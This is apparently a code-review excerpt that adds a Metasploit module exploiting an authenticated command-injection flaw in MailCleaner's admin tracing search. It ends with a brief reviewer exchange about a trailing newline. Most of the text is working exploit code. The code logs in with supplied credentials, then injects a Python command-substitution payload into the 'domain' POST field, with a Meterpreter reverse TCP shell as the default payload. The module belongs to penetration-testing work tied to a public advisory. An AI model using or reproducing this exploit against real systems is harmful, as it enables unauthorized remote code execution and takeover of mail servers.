modules/exploits/linux/http/mailcleaner_exec.rb

```diff
@@ -0,0 +1,118 @@
+
+        /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
+        operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true,
+          'WfsDelay' => 5,
+          'Payload'  => 'python/meterpreter/reverse_tcp'
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [[ 'Automatic', { }]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 19 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'The password to login with'])
+      ]
+    )
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def auth
+    print_status('Performing authentication...')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin/')
+    })
+
+    if res && !res.get_cookies.empty?
+      cookie = res.get_cookies
+    else
+      fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.')
+    end
+
+    # Performing authentication
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'admin/'),
+      'cookie'    => cookie,
+      'vars_post' => {
+        'username'  => username,
+        'password' => password,
+        'submit' => 'Log+in'
+      }
+    })
+
+    if res && res.code == 302
+      print_good("Awesome..! Authenticated with #{username}:#{password}")
+    else
+      fail_with(Failure::NoAccess, 'Credentials are not valid.')
+    end
+
+    cookie
+  end
+
+  def exploit
+    cookie = auth
+
+    if cookie.nil?
+      fail_with(Failure::Unknown, 'Something went wrong!')
+    end
+
+    print_status('Exploiting command injection flaw')
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
+      'cookie'    => cookie,
+      'vars_post' => {
+        'search' => rand_text_alpha(5),
+        'domain' => "';$(python -c \"#{payload.encoded}\");#",
+        'submit' => 1
+      }
+    })
+
+  end
+end
```

Comment:
It looks like you removed the EOF newline, too. Only the extra newline needed to be removed.

Reply:
😞 fixed.